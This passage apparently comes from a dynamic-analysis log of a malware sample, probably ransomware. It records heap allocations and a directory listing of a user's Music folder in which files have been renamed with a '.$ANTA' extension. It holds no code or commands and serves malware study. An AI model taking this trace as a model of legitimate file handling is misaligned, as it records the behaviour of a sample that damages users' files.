[0117.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0117.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0117.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0117.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0117.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0117.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0117.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0117.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0117.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0117.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0117.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0117.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0117.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0117.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0117.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369c10 [0117.873] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\spIObPh75b\\*", lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6d1a2630, ftCreationTime.dwHighDateTime=0x1d5eeb1, ftLastAccessTime.dwLowDateTime=0x1263e494, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1263e494, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca268, cFileName=".", cAlternateFileName="")) returned 0x41ac500 [0117.873] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6d1a2630, ftCreationTime.dwHighDateTime=0x1d5eeb1, ftLastAccessTime.dwLowDateTime=0x1263e494, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1263e494, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca268, cFileName="..", cAlternateFileName="")) returned 1 [0117.874] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x123b4f4c, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x123b4f4c, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x12499d37, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x17850, dwReserved0=0x0, dwReserved1=0x43ca268, cFileName="caX1anHBaP9sA34Tftcq.mp3.$ANTA", cAlternateFileName="CAX1AN~1.$AN")) returned 1 [0117.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0117.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0117.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0117.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0117.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0117.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8f00 [0117.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0117.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0117.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0117.874] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0117.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0117.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0117.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0117.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0117.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0117.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0117.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0117.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0117.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea268 [0117.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0117.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0117.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0117.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0117.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0117.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8cd8 [0117.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0117.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0117.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca268 [0117.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2b0 [0117.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0117.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0117.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0117.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0117.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0117.882] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x125cb0a0, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x125cb0a0, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1263e494, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x43f0, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="TFaPhwZGXS0zM.wav.$ANTA", cAlternateFileName="TFAPHW~1.$AN")) returned 1 [0117.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0117.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0117.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0117.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0117.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e18 [0117.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0117.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0117.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0117.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0117.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0117.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8cd8 [0117.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0117.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0117.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca280 [0117.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca298 [0117.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0117.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0117.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0117.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0117.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0117.883] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x43e25b0, ftCreationTime.dwHighDateTime=0x144ed98, ftLastAccessTime.dwLowDateTime=0x295a83, ftLastAccessTime.dwHighDateTime=0x43e25b0, ftLastWriteTime.dwLowDateTime=0x43e8cd8, ftLastWriteTime.dwHighDateTime=0x356310, nFileSizeHigh=0x29c786, nFileSizeLow=0x1809934, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="", cAlternateFileName="杻мńဓ+\x10")) returned 0 [0117.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0117.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0117.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0117.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0117.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9bf0 [0117.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0117.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0117.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1c0 [0117.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca310 [0117.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0117.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0117.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0117.884] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0117.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0117.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0117.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0117.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0117.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0117.884] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0117.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0117.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0117.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0117.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0117.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0117.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0117.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0117.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0117.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0117.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0117.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0117.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0117.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2e0 [0117.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca310 [0117.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca190 [0117.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1c0 [0117.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca250 [0117.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca388 [0117.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca280 [0117.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca268 [0117.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0117.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0117.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca298 [0117.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3b8 [0117.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0117.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0117.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0117.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0117.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0117.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0117.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0117.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0117.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0117.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0117.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0117.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0117.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0117.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0117.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0117.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0117.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0117.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0117.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0117.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0117.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0117.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0117.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0117.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0117.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0117.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0117.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0117.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0117.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0117.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0117.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0117.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0117.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0117.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0117.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0117.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0117.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0117.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0117.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0117.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0117.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0117.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0117.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0117.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0117.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0117.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0117.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0117.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0117.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0117.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0117.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0117.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0117.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0117.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0117.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0117.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0117.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0117.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0117.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0117.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0117.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0117.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0117.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0117.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0117.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0117.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0117.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0117.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0117.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0117.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0117.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0117.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0117.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0117.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0117.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0117.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0117.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0117.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0117.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0117.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0117.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0117.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0117.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0117.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0117.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0117.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0117.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0117.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42e3700 | out: hHeap=0x1780000) returned 1 [0117.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0117.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0117.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0117.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0117.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0117.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0117.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0117.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0117.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0117.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0117.888] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0117.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0117.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0117.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e99c8 [0117.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0117.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0117.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 